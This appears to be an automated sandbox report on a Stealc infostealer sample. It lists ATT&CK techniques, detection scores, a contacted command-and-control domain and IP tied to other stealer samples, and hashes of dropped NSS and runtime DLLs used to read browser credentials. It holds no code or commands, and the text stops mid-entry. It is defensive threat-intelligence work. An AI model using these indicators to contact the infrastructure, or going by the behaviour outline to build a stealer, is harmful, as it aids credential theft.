                  Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | LSASS Memory | 21 Security Software Discovery | Remote Desktop Protocol | 4 Data from Local System | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Process Injection | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 11 Process Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                  Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 143 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                  Source | Detection | Scanner | Label | Link
                  pYJeC4VJbw.exe | 66% | ReversingLabs | Win32.Trojan.Stealc |
                  pYJeC4VJbw.exe | 46% | Virustotal | | Browse
                  pYJeC4VJbw.exe | 100% | Joe Sandbox ML | |
                  Source | Detection | Scanner | Label | Link
                  C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
                  C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
                  C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
                  C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
                  C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
                  C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll | 0% | ReversingLabs | |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll | 0% | ReversingLabs | |
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  shaffatta.com | 0% | Virustotal | | Browse
Name: shaffatta.com; IP: 168.119.248.46; Active: true; Malicious: false; Reputation: unknown
IP: 168.119.248.46; Domain: shaffatta.com; Country: Germany; ASN: 24940; ASN Name: HETZNER-ASDE; Malicious: false
                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                      Analysis ID:1435882
                                                      Start date and time:2024-05-03 11:19:09 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 7m 14s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:5
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:pYJeC4VJbw.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:14c3db1bdba407c23f0e80bbfdd6db0f.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@1/29@1/1
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 61
                                                      • Number of non-executed functions: 116
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      No simulations
Match: 168.119.248.46 (Associated Sample Name / URL, Detection, Threat Name)
• Wb9LZ5Sn1l.exe: malicious (Mars Stealer, Stealc, Vidar)
• c4RAHq3BNl.exe: malicious (Mars Stealer, Stealc, Vidar)
• 34cFFMVY3B.exe: malicious (Mars Stealer, Stealc, Vidar)
Match: shaffatta.com (Associated Sample Name / URL, Detection, Threat Name, Context)
• Wb9LZ5Sn1l.exe: malicious (Mars Stealer, Stealc, Vidar); context: 168.119.248.46
• c4RAHq3BNl.exe: malicious (Mars Stealer, Stealc, Vidar); context: 168.119.248.46
• 34cFFMVY3B.exe: malicious (Mars Stealer, Stealc, Vidar); context: 168.119.248.46
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| HETZNER-ASDE | Wb9LZ5Sn1l.exe | malicious | Mars Stealer, Stealc, Vidar | 168.119.248.46 |
| | ydwVTacfTd | malicious | Unknown | 95.216.216.96 |
| | c4RAHq3BNl.exe | malicious | Mars Stealer, Stealc, Vidar | 168.119.248.46 |
| | file.exe | malicious | Vidar | 95.217.245.42 |
| | c8sDO7umrx.exe | malicious | CMSBrute | 49.13.210.40 |
| | http://event.strategiedirect.com | malicious | Unknown | 167.233.13.125 |
| | Jkxkt.exe | malicious | Unknown | 88.99.137.18 |
| | Jkxkt.exe | malicious | Unknown | 88.99.137.18 |
| | U8uFcjIjAR.exe | malicious | LummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine | 116.202.23.44 |
| | yZcecBUXN7.exe | malicious | FormBook | 148.251.36.121 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 37f463bf4616ecd445d4a1937da06e19 | 586 R1 M-LINE - GEORGIA 03.05.2024.exe | malicious | GuLoader, Remcos | 168.119.248.46 |
| | a.exe | malicious | FormBook, GuLoader | 168.119.248.46 |
| | a.exe | malicious | FormBook, GuLoader | 168.119.248.46 |
| | Wb9LZ5Sn1l.exe | malicious | Mars Stealer, Stealc, Vidar | 168.119.248.46 |
| | SecuriteInfo.com.Variant.Doina.72042.21290.22220.exe | malicious | Unknown | 168.119.248.46 |
| | c4RAHq3BNl.exe | malicious | Mars Stealer, Stealc, Vidar | 168.119.248.46 |
| | file.exe | malicious | Vidar | 168.119.248.46 |
| | JpFr8C6ljd.dll | malicious | Unknown | 168.119.248.46 |
| | JpFr8C6ljd.dll | malicious | Unknown | 168.119.248.46 |
| | file.exe | malicious | SmokeLoader | 168.119.248.46 |
| Match | Associated Sample Name / URL | Detection | Threat Name |
| C:\ProgramData\freebl3.dll | Wb9LZ5Sn1l.exe | malicious | Mars Stealer, Stealc, Vidar |
| | c4RAHq3BNl.exe | malicious | Mars Stealer, Stealc, Vidar |
| | exDbnS3M12.exe | malicious | Mars Stealer, Stealc, Vidar |
| | qa4Ulla1BY.exe | malicious | Mars Stealer, Stealc, Vidar |
| | U8uFcjIjAR.exe | malicious | LummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine |
| | JlvRdFpwOD.exe | malicious | Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT |
| | file.exe | malicious | LummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine |
| | file.exe | malicious | Vidar |
| | 0dN59ZIkEM.exe | malicious | Vidar |
| | 34cFFMVY3B.exe | malicious | Mars Stealer, Stealc, Vidar |
| C:\ProgramData\mozglue.dll | Wb9LZ5Sn1l.exe | malicious | Mars Stealer, Stealc, Vidar |
| | c4RAHq3BNl.exe | malicious | Mars Stealer, Stealc, Vidar |
| | exDbnS3M12.exe | malicious | Mars Stealer, Stealc, Vidar |
| | qa4Ulla1BY.exe | malicious | Mars Stealer, Stealc, Vidar |
| | U8uFcjIjAR.exe | malicious | LummaC, Amadey, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine |
| | JlvRdFpwOD.exe | malicious | Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT |
| | file.exe | malicious | LummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine |
| | file.exe | malicious | Vidar |
| | 0dN59ZIkEM.exe | malicious | Vidar |
| | 34cFFMVY3B.exe | malicious | Mars Stealer, Stealc, Vidar |
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114688
                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.690067217069288
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
                                                                                                    MD5:4E32787C3D6F915D3CB360878174E142
                                                                                                    SHA1:57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
                                                                                                    SHA-256:2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
                                                                                                    SHA-512:CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28672
                                                                                                    Entropy (8bit):2.5793180405395284
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.705615236042988
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:B65nSK3I37xD9qo21p9G7ILc3pkowOeuiyJRdt7fXzyxu3f7Lj8X2:B65SK3Xx1OXpkowOeMJR/fzeYX8X2
                                                                                                    MD5:159C7BA9D193731A3AAE589183A63B3F
                                                                                                    SHA1:81FDFC9C96C5B4F9C7730127B166B778092F114A
                                                                                                    SHA-256:1FD7067403DCC66C9C013C2F21001B91C2C6456762B05BDC5EDA2C9E7039F41D
                                                                                                    SHA-512:2BC7C0FCEB65E41380FE2E41AE8339D381C226D74C9B510512BD6D2BAFAEB7211FF489C270579804E9C36440F047B65AF1C315D6C20AC10E52147CE388ED858A
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):106496
                                                                                                    Entropy (8bit):1.1358696453229276
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49152
                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5242880
                                                                                                    Entropy (8bit):0.037963276276857943
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                    MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                    SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                    SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                    SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):40960
                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98304
                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.699548026888946
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                    MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                    SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                    SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                    SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.70435191336402
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:q83Oua2II99Dm5Xcf7kmp5fFjUTZF/+akoYY9fBpCtJ6Wi5v:7OD2ISi5Xcz9l8RkcFCJ6Wix
                                                                                                    MD5:8C1F71001ABC7FCE68B3F15299553CE7
                                                                                                    SHA1:382285FB69081EB79C936BC4E1BFFC9D4697D881
                                                                                                    SHA-256:DCC1D5A624022EFCE4D4A919041C499622A1213FD62B848C36E6252EE29B5CAE
                                                                                                    SHA-512:8F2124445F7856BFFBB3E7067135CFA70BFB657F8CEAEE89312CF15CFA127CACF28C2F1F9CD1CC64E56A8D8C248E237F2E97F968D244C457AD95D0AD5144E2A7
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.701757898321461
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                    MD5:520219000D5681B63804A2D138617B27
                                                                                                    SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                    SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                    SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.69156792375111
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                    MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                    SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                    SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                    SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1026
                                                                                                    Entropy (8bit):4.69156792375111
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                    MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                    SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                    SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                    SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):685392
                                                                                                    Entropy (8bit):6.872871740790978
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                    MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                    SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                    SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                    SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: Wb9LZ5Sn1l.exe, Detection: malicious
                                                                                                    • Filename: c4RAHq3BNl.exe, Detection: malicious
                                                                                                    • Filename: exDbnS3M12.exe, Detection: malicious
                                                                                                    • Filename: qa4Ulla1BY.exe, Detection: malicious
                                                                                                    • Filename: U8uFcjIjAR.exe, Detection: malicious
                                                                                                    • Filename: JlvRdFpwOD.exe, Detection: malicious
                                                                                                    • Filename: file.exe, Detection: malicious
                                                                                                    • Filename: file.exe, Detection: malicious
                                                                                                    • Filename: 0dN59ZIkEM.exe, Detection: malicious
                                                                                                    • Filename: 34cFFMVY3B.exe, Detection: malicious
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):608080
                                                                                                    Entropy (8bit):6.833616094889818
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                    MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                    SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                    SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                    SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Joe Sandbox View:
                                                                                                    • Filename: Wb9LZ5Sn1l.exe, Detection: malicious
                                                                                                    • Filename: c4RAHq3BNl.exe, Detection: malicious
                                                                                                    • Filename: exDbnS3M12.exe, Detection: malicious
                                                                                                    • Filename: qa4Ulla1BY.exe, Detection: malicious
                                                                                                    • Filename: U8uFcjIjAR.exe, Detection: malicious
                                                                                                    • Filename: JlvRdFpwOD.exe, Detection: malicious
                                                                                                    • Filename: file.exe, Detection: malicious
                                                                                                    • Filename: file.exe, Detection: malicious
                                                                                                    • Filename: 0dN59ZIkEM.exe, Detection: malicious
                                                                                                    • Filename: 34cFFMVY3B.exe, Detection: malicious
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):450024
                                                                                                    Entropy (8bit):6.673992339875127
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                    MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                    SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                    SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                    SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Process:C:\Users\user\Desktop\pYJeC4VJbw.exe
                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2046288
                                                                                                    Entropy (8bit):6.787733948558952
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
